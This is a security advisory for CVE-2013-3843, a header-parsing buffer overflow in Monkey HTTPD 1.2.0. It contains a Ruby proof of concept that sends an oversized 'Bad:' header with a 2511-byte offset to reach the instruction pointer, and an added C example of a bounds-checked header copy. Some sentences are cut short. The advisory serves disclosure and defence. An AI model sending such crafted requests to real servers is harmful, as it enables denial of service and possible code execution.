Date: Tue Jun 04 2013 - 11:19:49 CDT
CVE-2013-3843 Monkey HTTPD 1.2.0 - Buffer Overflow DoS
Vulnerability With Possible Arbitrary Code Execution
Monkey is a lightweight and powerful web server for
It has been designed to be very scalable with low memory
and CPU consumption, the perfect solution for embedded
devices. Made for ARM, x86 and x64.
A specially crafted request sent to the Monkey HTTPD
server triggers a buffer overflow which can be used to
control the flow of execution.
4. Report Timeline
Discovered vulnerability via fuzzing
6. Affected Products
Monkey HTTPD <= 1.2.0
7. Exploitation Technique
Improper bounds checking while parsing headers allows
an attacker to craft a request that triggers a buffer
overflow during a call to memcpy() on line 268 of
mk_request.c.
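The missing check described above, as an added example (not code from Monkey or from this advisory): a header-value copy that compares the request-supplied length with the destination size before calling memcpy(). The function name, the return codes and the 256-byte limit are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define HDR_VALUE_MAX 256   /* assumed destination size, not Monkey's */

enum { HDR_MALFORMED = -1, HDR_TOO_LONG = -2 };

/*
 * Copy the value of one "Name: value" header line into dst.
 * line is not NUL-terminated; line_len excludes the trailing CRLF.
 * Returns the value length, or a negative HDR_* code without touching dst.
 */
static int copy_header_value(char *dst, size_t dst_size,
                             const char *line, size_t line_len)
{
    const char *colon = memchr(line, ':', line_len);
    if (colon == NULL || colon == line)
        return HDR_MALFORMED;           /* no separator or empty name */

    const char *val = colon + 1;
    const char *end = line + line_len;
    while (val < end && (*val == ' ' || *val == '\t'))
        val++;                          /* skip optional whitespace */

    size_t val_len = (size_t)(end - val);
    /* The check an unchecked memcpy(dst, val, val_len) lacks:
     * the length comes from the request, so compare it with the
     * destination size (leaving room for the terminator) first. */
    if (dst_size == 0 || val_len >= dst_size)
        return HDR_TOO_LONG;

    memcpy(dst, val, val_len);
    dst[val_len] = '\0';
    return (int)val_len;
}

int main(void)
{
    char value[HDR_VALUE_MAX];
    char big[5 + 2515];                 /* constructed: "Bad: " + 2515 bytes */
    memcpy(big, "Bad: ", 5);
    memset(big + 5, 'A', 2515);

    printf("%d\n", copy_header_value(value, sizeof value, "Host: localhost", 15));
    printf("%d\n", copy_header_value(value, sizeof value, big, sizeof big));
    return 0;
}
```

A caller that receives HDR_TOO_LONG can reject the request instead of processing the header.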
9. Proof of Concept
The vulnerability can be exploited by a remote attacker
without any special privileges. Under Ubuntu 13.04,
an offset of 2511 lines up the instruction pointer
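require 'socket'

# Target host and port
host = "localhost"
port = 2001
s = TCPSocket.open(host, port)
buf = "GET / HTTP/1.1\r\n"
buf << "Host: " + "\r\n"
buf << "localhost\r\n"
# Oversized header value: 2511 filler bytes
buf << "Bad: "
buf << "A" * 2511
# 4 marker bytes at the offset that lines up with the instruction pointer
buf << "B" * 4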
There is currently no solution.
Risk should be considered high since it can be shown that
the flow of execution can be controlled by an attacker.
Doug Prostko <dougtko[at]gmail[dot]com>